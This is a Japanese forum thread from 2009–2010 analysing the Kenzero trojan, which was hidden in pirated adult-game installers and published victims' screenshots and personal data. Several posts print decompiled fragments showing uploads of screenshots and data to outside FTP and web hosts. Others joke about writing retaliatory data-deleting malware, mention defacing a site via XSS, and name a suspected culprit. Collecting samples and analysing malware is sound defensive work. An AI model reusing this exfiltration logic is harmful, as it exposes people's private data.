【エロゲ】割れ厨個人情報流出祭り -出張板-

1 ：2009/11/26 〜 最終レス ：2011/12/25

【エロゲ】割れ厨個人情報流出祭り
http://tsushima.2ch.net/test/read.cgi/news/1259236812/
setup.exeを実行するとスクリーンショット+個人情報が晒されるウイルスとのこと
AVGやAvastを入れてながらも被害が出ています

2 ：

koreka

3 ：

　 　　 　　＿＿＿_
　 　　　／　　 　 　＼
　　　／　 _ノ 　ヽ､_　 ＼
　 ／ oﾟ(（●）) (（●）)ﾟo ＼ 　ほんとはニュー速でやりたいんだお…
　 |　　　　 （__人__）'　　　　|
　 ＼　　 　　｀⌒´ 　 　 ／
　 　 　　　＿＿＿_
　 　　　／　　 　 　＼
　　　／　 _ノ 　ヽ､_　 ＼
　 ／ 　oﾟ⌒　　　⌒ﾟo　 ＼ 　でもニュー速民はｸｵﾘﾃｨ高いｽﾚしか相手してくれないお…
　 |　　　　 （__人__）　　　　|
　 ＼　　 　 ｀ ⌒´ 　 　 ／
　 　 　　　＿＿＿_
　 　　　／⌒　　⌒＼
　　　／（ ●） 　（●）＼
　 ／::::::⌒（__人__）⌒::::: ＼ 　　だからセキュ板でやるお！
　 |　　　　　|r┬-|　　　　　|
　 ＼ 　　 　 `ー'´ 　 　 ／

4 ：

バスターだけ検出したらしいな、他は全滅
バスター厨大勝利

5 ：

ノートンも検出したらしい

6 ：

「らしい」じゃなくて、exeかVirusTotalないの？

7 ：

exe持ってるやつVirusTotalかけろよ

8 ：

これどういった挙動してたの？興味あるわ

9 ：

検証してやるからうｐれよ

10 ：

これであってる？
ファイルサイズ： 56832 bytes
ファイルタイプ： PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
MD5: 7d69a51fd4e2c7e62b5f7aaaddd50b56
SHA1: 96e9e72d8e577acb687d01bebe626bbff791479c

11 ：

検体ってもらったやつ
ttp://www.virustotal.com/Risis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259248350

12 ：

>>11
おいおい検出0かよ。
バスターは検出ってレス見たけど？

13 ：

検体くれ

14 ：

バスターは検出検出してるSSがあった
これらしい
検体
Sc_58437

15 ：

検出不可能だな
間違えて送信しちゃったかも、クリーン環境だけど

16 ：

MD5もSHA1も一致してるぞ

17 ：

>>14
素人で申し訳ない
どこで入手できるんでしょうか

18 ：

ここ
ttp://www.axfc.net/uploader/

19 ：

>>18
ありがとうございます。
,NETアプリのようで、これはヒューリスティックでも検出は困難そうですね。
犯人の名前は健三さんかもしれませんね。
0x0040E520 43 3A 5C 55 73 65 72 73 5C 4B 45 4E 5A 4F 5C 44 C:\Users\KENZO\D +C520
0x0040E530 6F 63 75 6D 65 6E 74 73 5C 56 69 73 75 61 6C 20 ocuments\Visual +C530
0x0040E540 53 74 75 64 69 6F 20 32 30 30 38 5C 50 72 6F 6A Studio 2008\Proj +C540
0x0040E550 65 63 74 73 5C 50 61 73 73 77 6F 72 64 54 72 61 ects\PasswordTra +C550
0x0040E560 70 5C 50 61 73 73 77 6F 72 64 54 72 61 70 5C 6F p\PasswordTrap\o +C560
0x0040E570 62 6A 5C 44 65 62 75 67 5C 53 65 74 75 70 2E 70 bj\Debug\Setup.p +C570
0x0040E580 64 62 00 00 AC E5 00 00 00 00 00 00 00 00 00 00 db.............. +C580

20 ：

小相澤涼太じゃなかったか

21 ：

流通したexeは全て共通なのかな？
もうサイトは404で見れないけど、一人一人にゲーム名が書いてあったから
ゲームの数だけexeがあるのかと思ったけど

22 ：

config.xmlが個別なだけやろ

23 ：

ttp://www.dotup.org/uploda/www.dotup.org399874.jpg
string requestUriString = "ftp://ftp96.heteml.jp/web/img/user/" + Settings.Default.image;
string str5 = path + @"\" + Settings.Default.image;
WebRequest request = WebRequest.Create(requestUriString);
request.Credentials = new NetworkCredential("p3p", "sameru");

24 ：

>>19
犯人の好きなブランドの名前じゃないのかなぁ
全部大文字だし

25 ：

割れ厨ざまあｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

26 ：

そういやサイト見ただけで晒されるってのは本当なのか？
それともデマ？

27 ：

デマ

28 ：

怖いならjavascriptとjava切っとけ

29 ：

2chに張られたリンクをクリックするときには、JaneからJava,Javascript、pluginの
全てを無効化する起動スイッチをつけたchromeが立ち上がるようにしてあります

30 ：

exeのアイコンがアクティブになってるSSとそうでないSSがあったけど、
SS撮影のタイミングと送信のタイミングってどうなってたの？

31 ：

撮影のタイミングはexe終了のタイミングらしい。

32 ：

>>31
ありがと
妙なタイミングだね
exe起動後におかしいと気づいてネット切断するケースも多そうなのに

33 ：

>>24
お前ウイルス作った本人だろ？ｗ
覚悟しとけよ＾＾

34 ：

どう考えてもブランド名では無いよなぁ・・・。

35 ：

> 969 名前： ウィンナー巻き(東日本)[sage] 投稿日：2009/11/27(金) 07:34:04.97 ID:Qey0Mp+j
> とりあえずhttp://www.pass-word.org/のロゴ変えて来た
ν速民の遊び場になってる。
しかし、XSSの対応とか全くしてないんだな。
そんな知識もないんだろう。
カス過ぎる。

36 ：

なんか二次エロ系の画像を貼るスレってあるだろ？
実はエロゲのCGばかりでなうｐられてるzipとかにもよくある
つまり二次エロ画像のzipをダウンロードしてる人も割れ厨と似たような人間って事だ(ｷﾘｯ

37 ：

俺のクソＥＳＥＴはまた未検知だしなぁ・・・
トロイに感染しまくりで役に立ったことないな。

38 ：

これか
http://birthofblues.livedoor.biz/archives/50949467.html

39 ：

不謹慎だとは思うが、俺も偽装データを作ろうと思うw
KENZOはどん欲さと詰めの甘さで残念なことになったが、俺はパワーユーザでも引っかかってしまうようなクオリティーを目指して頑張るぜ
気をつけろよwwwwwwwwwwwwwwwww

40 ：

現在対応済みはノートンだけ

41 ：

本当に対応しなければいけないのはユーザーの方だよ
情弱割れ厨を片っ端から駆逐するようなウイルスをさっさと作れよ

42 ：

例えば、セキュリティソフトがwinnyやshareを検出すれば全て解決なのに
それをやるとなぜかブチ切れるユーザーが現れるんだよな「ウイルスじゃない！ファビョーン」って
AVGやavastとかも確かやったがすぐ修正した

43 ：

Vector：HIKARU (Windows95/98/Me / アミューズメント) - ソフトの詳細
http://www.vector.co.jp/soft/win95/amuse/se217070.html
HIKARU
作者： 林 啓文
一定時間毎に、突然女性の幽霊の画像がディスプレーに表示されるジョークソフト

一定時間毎に、突然女性の幽霊の画像がディスプレーに表示されるジョークソフトです。このプログラムは起動させても何の
表示もせず、起動しているのがわかりません。何の表示もせずにプログラムはメモリに常駐します。起動させて数分後、突然
女性の幽霊の画像がディスプレーに表示され、同時にスピーカーから女性の悲鳴が流れます。画像は一秒位で消えます。
そのあとはWindowsを再起動するまで、何度も現れます。
※ 警告:子供、妊婦、心臓が弱い方、精神的に弱い方等はこのソフトを使用しないでください。

注記:使用しているウイルススキャナーによってはJOKEプログラムであるとの判断の元で警告が出る場合があります。ご利用の
さいにはその点を確認の上でご使用ください。

VirusTotal - 無料オンライン ウイルス／マルウェア スキャン - 結果
ファイル名 hikaru.exe 受理 2009.11.27 22:15:19 (UTC)
現在の状態： 完了
結果: 27/41 (65.86%)
http://www.virustotal.com/jp/Risis/3c13e6169994f9e5eab10642200b5e91457b93676c73e1695caee530623d4f0b-1259360119

44 ：

やっぱり中国人は頭がおかしいな

45 ：

>>41
踏んだときの動作として定番のデータ削除と通報を入れようと思うんだが、なんかいい案はあるか？
もちろん、動作は"このソフトウェアの使用による損害に対し、一切責任を負いません"との免責事項の後にwwww

46 ：

>>45
免責事項あっても悪用される可能性がある事は想定できるから、裁判ではかなり不利だね。
winnyもそれで裁判沙汰になってるんだし。
悪い奴には何してもいい的なものは司法の世界では理解されないんだよ。

47 ：

>>46
やっぱり甘くはないかwwwwwww
でも割れ厨は逝ってほしいw

48 ：

アンチウイルスメーカー何か間違えたのか
正式名称がケンゼロウイルスにｗ
http://www.virustotal.com/Risis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259430127
PCTools 7.0.3.5 2009.11.28 Trojan-PSW.Kenzero
Symantec 1.4.4.12 2009.11.28 Infostealer.Kenzero

49 ：

>>48
Result: 4/41 (9.76%)
か。意外と時間かかるもんだな。

50 ：

今更こんなお祭りがあったの知った。
結局どう言う事なのかなこれ？
洒落やtorrentなどで落としたエロゲにウィルスが入ってて、起動させたら、スクショとＩＰアドレス流出。
↓
さらに自分で個人情報を登録。
↓
スクショと個人情報がＨＰに載せられる
↓
著作権侵害だから金払えメールが来た
こう言うこと？
自分から登録してない人はスクショとＩＰとかだけ情報もれたって事か？ｗ

51 ：

>>48
みんな検体送ってんのかな？とりあえずsymantecとavastに送っておいたけど

52 ：

起動するだけでスクショ張られんの？

53 ：

Kenzeroひっかかったｗ
やべぇ、駆除できねぇｗｗ
どうゆうことなの…

54 ：

今流行っているウイルスについて
スクショ貼り先の掲示板がなくなっているってことは、
今このウイルスにかかってもスクショが晒されることないの？？

55 ：

ないよ！

56 ：

ちょっと書いとこう。
昨日(29日)時点だと、起動してもsetup.exeが終了する。
OSはVista。
スクリーンショットを撮り、
保存するところまでは動作する。
SSはCドライブ直下に作られた
ランダムな英数字のフォルダに保存される。
そこから先の動作はわからない。

57 ：

>>56
vistaとか7はUACあるけど、有効にしていても観戦しちゃうのか・・・
ところで、直下ってことはCの次の階層に数字列の名前で生成されるってことでおｋ？

58 ：

個人情報をさらすマルウェア、Shareを通じて日本で流通
http://www.itmedia.co.jp/news/articles/0911/30/news010.html
http://tsushima.2ch.net/test/read.cgi/newsplus/1259539872/-100

59 ：

なんか祭の鎮火も早かったけど感染した皆さんはあの後どうしたんだろう
各種アンチウィルスソフトが対応したのかな？

60 ：

setup.exe削除で終了じゃないの？ｗ

61 ：

>>56
もし感染してＳＳとられた場合、Ｃを開いた所に勝手に作られた数字名のフォルダがあってそこにＳＳ有るって事か？

62 ：

>>61
いや単純にウィルス駆除できたのかなってこと
>>60の言うとおりsetup.exe削除だけで済んだのかな
ウィルスというより悪質なジョークアプリみたいなもんか

63 ：

俺も試して見ようと思って一昨日torrentで落としたの試してみたんだけどさ、ＳＳを保存されてる所がわからなくてねｗ
何か解りやすいフォルダにＳＳ入ってるって聞いたから直ぐ見つかると思ったんだけど見つからない。
見つからないと言う事は、感染してなかった奴だったのかもしれないｗ
まあ、もう消しちゃったけどｗ

64 ：

>>60
そうだよ
C以下のそれが入ってるフォルダをつまんで捨てるだけｗ

65 ：

>>63
ただ単にエロゲ落としただけじゃねーか！
トレじゃなくshereのみだったらしいからそりゃ感染してねーわｗ

66 ：

>>65
そうなの？
torrentの方でも出回っていると聞いたのでやってみたのだが、違ったのか。

67 ：

>>63
そのsetup.exeが48の
http://www.virustotal.com/Risis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259430127
でなければ違う。
トレントで流れてるかは不明だけど、たぶん流れてない。
あと今実行しても、>>23の処理ができずに終了するんじゃないかな。

68 ：

大して盛り上がらず馬鹿が自滅しただけか

69 ：

えっ
http://www.itmedia.co.jp/enterprise/articles/0911/30/news010.html

70 ：

>>14
検体、圧縮ファイルのままだと、G-Dataでは検出できないんだが・・・。
G-Dataって検出率って世界最高じゃなかったか？

71 ：

>>70
検体送った？
検体送りもしないのに喚いてる奴はｸﾚｸﾚ乞食同様

72 ：

G DATAってどこに提出すればいいの？
avastとbitは今送ったけど

73 ：

ユーザーがゲームだと思ってこのファイルを展開すると、氏名、住所、電話番号、社名、メールアドレス、パスワードなどの入力を促す画面が表示される。ここでだまされて情報を入力すると、自分のPCのシステム情報やデスクトップのスクリーンショット
などと併せて、Webサイト上で公表されてしまうという。

74 ：

>>71
>>72
送ったよ。

75 ：

すまん、送れてなかったorz
これ、どうやって送るんだ・・・。

76 ：

F-Secureに送った
最新定義で検出確認済み

77 ：

>>76
ありがとー。

78 ：

>>72
ambulanz_dsk_jap@gdata.de

79 ：

japって最低だなおい

80 ：

>>78
それ届かなくねーか

81 ：

カスペ（笑）
112 ：名無しさん＠お腹いっぱい。：2009/12/02(水) 02:22:48
結果: 0/41 (0.00%)
http://www.virustotal.com/jp/Risis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259248350
結果: 12/41 (29.27%)
http://www.virustotal.com/jp/Risis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259687279

すぐ上は10分ぐらい前の状態
お前等、どんなに力んでも下のようになるだけだから無駄な抵抗だｗ

>>43
> Vector：HIKARU (Windows95/98/Me / アミューズメント) - ソフトの詳細
> http://www.vector.co.jp/soft/win95/amuse/se217070.html
> HIKARU
> 作者： 林 啓文
> 一定時間毎に、突然女性の幽霊の画像がディスプレーに表示されるジョークソフト
> 一定時間毎に、突然女性の幽霊の画像がディスプレーに表示されるジョークソフトです。このプログラムは起動させても何の
> 表示もせず、起動しているのがわかりません。何の表示もせずにプログラムはメモリに常駐します。起動させて数分後、突然
> 女性の幽霊の画像がディスプレーに表示され、同時にスピーカーから女性の悲鳴が流れます。画像は一秒位で消えます。
> そのあとはWindowsを再起動するまで、何度も現れます。
> ※ 警告:子供、妊婦、心臓が弱い方、精神的に弱い方等はこのソフトを使用しないでください。
> 注記:使用しているウイルススキャナーによってはJOKEプログラムであるとの判断の元で警告が出る場合があります。ご利用の
> さいにはその点を確認の上でご使用ください。
> VirusTotal - 無料オンライン ウイルス／マルウェア スキャン - 結果
> ファイル名 hikaru.exe 受理 2009.11.27 22:15:19 (UTC)
> 現在の状態： 完了
> 結果: 27/41 (65.86%)
> http://www.virustotal.com/jp/Risis/3c13e6169994f9e5eab10642200b5e91457b93676c73e1695caee530623d4f0b-1259360119

82 ：

これ純粋な意味でウィルスじゃないからな。
しかし落としてきたエロゲーに個人情報律儀に入力するって馬鹿なのかｗ

83 ：

ウイルスだよ

84 ：

該当のexeが混入してるエロゲーのタイトルを知りたかったのだが

85 ：

BALDR SKY Dive2 ''RECORDARE'
Dark Blue
KISS×600 管理人さんのポニーテール
Last Waltz〜白濁まみれの夏合宿〜
PrettyDevilパラダイス〜ミリオム魔界奪還指令！
VenusBlood-DESIRE-
ギリギリ☆すくーぷ2〜潜入！！禁断のチアリーディング部〜
スズノネセブン！-Sweet Lovers' Concerto-
すももぱっく！
そらふね
プリンセス・プリンセス〜姉妹姫背徳の儀式〜
モリガンの憂鬱〜R堕の女王〜
R辱心療クラブ
R妖蟲 悦〜快楽変化退魔録〜
夏いろペンギン-The sunlight of the early summer to glitter to the blue sky-
今日のおかず 第20号
紫電〜円環の絆〜
美RR\妹 遥「私にイヤらしいコスプレさせるなんて……この変態！」
魔物娘との性活 ラミアの場合
妹スマイル
他にもあるかも

86 ：

今日のおかずはカレーライスどす

87 ：

対応済みなの今どれくらいあるんだろ

88 ：

そんな大規模にやってるのかｗ
BBSなんかにうｐらないで直接クレカ情報で金稼げばいいのに。
そこが外人と日本人の違うところだな。

89 ：

http://b.koroweb.com/pa/patio.cgi?room=kuroron
割れ厨くろちゃん（笑）の掲示板ｗｗｗ

90 ：

シレンスレに割れ厨さんがいらっしゃいますよー
127　以下、名無しにかわりましてVIPが実況します　[sage]　2010/01/13(水) 16:51:28.07 ID:TYZQdOG70
マジコン使えばいいじゃん
ＩＳＯなら海外サイトに腐るほどあるし

91 ：

kihon　画　age　０　PS1　１　KO

92 ：

http://www17.atpages.jp/pugyah/data/1266934888.png
http://www17.atpages.jp/~pugyah/data/1266928086.png

93 ：

>>92
割れ厨チェッカー作ったｗｗ
http://yutori7.2ch.net/test/read.cgi/news4vip/1266914677/
これか

94 ：

上
http://www.virustotal.com/jp/Risis/803cd2095848d1df6104b43c04ce1fc37ca9bd2ac0bc5c7ba85decef14b55984-1266935892

95 ：

またロマンシングか

96 ：

483 名前： 筆(石川県)　[]　投稿日：2010/03/19(金) 19:09:05.99 ID:HHiOP6ls
>>175
public int
　b_day b_month b_year i_family i_house i_job i_pref i_question
public static
　Settings Default
public string
　Clip CurrentDirectory HOST IP MachineName MyMusic MyPictures OSVersion Screen TickCount
　UserDomainName UserName WorkingSet addr1 addr2 age answer birth company companypost
　email f1 f2 family fax feedback filepath fn friend1 friend2 friend3 hero1 hero2 hero3 hobby
　house ih ih_dir image instalpass it it_dir job loan lover1 lover2 lover3 mei memail motivation mtel
　password pref question salary sei R specialty tel type uid zip zip1 zip2
　url DefaultSettingValue("http://warezer.net/")
　post_ss DefaultSettingValue("ss.php")
しっかり送信するように設定されてたお（´・ω・｀）
844 名前： 筆(石川県)　[]　投稿日：2010/03/19(金) 19:46:47.79 ID:HHiOP6ls
>>538
いや、ftpとかは無くphpだから
普通に
public static void SiteOpen()
{
　Process.Start("http://warezer.net の変数" + "entry/user/" + uid);
}
で
　private void UploadFile();　→　ss.php　に SS.jpg をPOST
　private void UploadFile2();　→　ss.php　に サムネイル_s.jpg をPOST
　private void UploadFile3();　→　xml.php　に データの詰まったuid.xml をPOST
しているだけみたいだよ（´・ω・｀）

97 ：

別にデスクトップにはほとんど何もないし
情報なんて入力してないからどうでもいいっちゃいいんだが
SS撮られるのってsetupを起動した最初だけなのかね？
setupを削除しちまえば後は大丈夫ってんならまぁいいや

98 ：

検体での認識
MICROSOFT SECURITY ESSENTIALS
trojan:win32/bumat!rts
定義2010/3/22 5:10
ウイルス定義バージョン1.79279.0
スパイ定義バージョン1.79279.0
マルウェア2.1.6519.0

99 ：

ウィルス名は結局「Kenzero」で決定？

100read 1read

1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲

Hotmailのパスワードの解析 (276)
いまだにセキュリティソフト入れてないヤツいる？ (238)
VISTA標準ファイアウォールを語る (419)
常時接続のご時世、ルータはどれがいい？ (643)
SGアンチスパイ2　Part2 (742)
【TBS土8】ブラッディ・マンデイ【ハッカー目線】 (255)
--log9.info------------------
【Taylor】The Pretty Reckless【Momsen】 (266)
Nickelback （ニッケルバック） Part6 (738)
フジロック初心者隔離スレ　vol.11 (700)
Bon Iver ボン・イヴェール (516)
The Who（ザ・フー）Part40 (549)
【Give Me】Pitbull 【Everything】 (320)
【グランジ】 Grunge系総合 Part 5 【オルタナ】 (435)
MGMT Part3 (411)
【パクリ】この曲とこの曲は似てる！？ (886)
Phoenix / Tahiti 80 vol.2 (639)
∴∵∴Little Barrie Part4∴∵∴ (534)
【エリック】Eric Clapton Part 23【クラプトン】 (842)
【Where We Are】WESTLIFE【What About Now】 (833)
ギターポップ　7 (507)
The Flaming Lips Part.8 (655)
The All-American Rejects Part3 (911)
--log55.com------------------
【PSO2】水着ローザがえちえちすぎると話題に
【PSO2】マトイ実装【クラスガーディガン】
【民度最悪】FF14叩きが酷すぎる
【PSO2】臣民とテンパの絆の物語【光のご父さん】
【PSO2】二郎系の旨いラーメン屋を教えてくれ
(´・ω・｀)
【国2敗北】FF14ガチ勢がイケメンだと話題に
【豚小屋民】PHANTASY STAR ONLINE2【見てる〜？】3